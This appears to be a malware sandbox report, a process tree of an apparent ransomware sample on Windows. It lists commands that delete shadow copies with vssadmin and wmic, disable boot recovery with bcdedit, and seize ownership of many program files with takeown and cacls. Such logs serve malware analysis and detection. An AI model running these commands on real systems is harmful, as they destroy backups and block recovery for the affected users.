- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "wab.exe" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C2⤵
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3291209C-224A-48E3-9FF0-2DC0E7345403} S-1-5-21-3470981204-343661084-3367201002-1000:GLTGRJAG\Admin:Interactive:[1]1⤵
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\u3kKsgfY.bat"2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui" /E /G Admin:F /C4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ENUtxt.pdf" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Genko_1.jtp" -nobanner1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner1⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "usa.fca" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "usa.fca" -nobanner3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Graph.jtp" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"3⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui"4⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner5⤵
-
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui" /E /G Admin:F /C4⤵
-
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "AGMGPUOptIn.ini" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "SY______.PFB" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "server_lg.gif" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "distribute_form.gif" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "email_all.gif" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MyriadPro-Bold.otf" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui"2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "SYMBOL.TXT" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"1⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ICELAND.TXT" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "forms_received.gif" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "rss.gif" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Workflow.Targets" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\JNTFiltr.dll.mui"1⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\jnwmon.dll.mui" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "CP1251.TXT" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Dotted_Line.jtp" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C1⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"1⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "watermark.png" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MinionPro-Regular.otf" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "usa03.ths" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CROATIAN.TXT" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "zy______.pfm" -nobanner2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "adobepdf.xdc" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ChessMCE.png" -nobanner3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\es-ES\msoeres.dll.mui"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "can.hyp" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "end_review.gif" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "wab.exe" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ZY______.PFB" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "TURKISH.TXT" -nobanner4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C4⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui"1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Journal.exe"1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui"2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "open_original_form.gif" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "review_same_reviewers.gif" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"1⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ReadMe.htm" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "SY______.PFM" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "brt55.ths" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "engphon.env" -nobanner1⤵
-
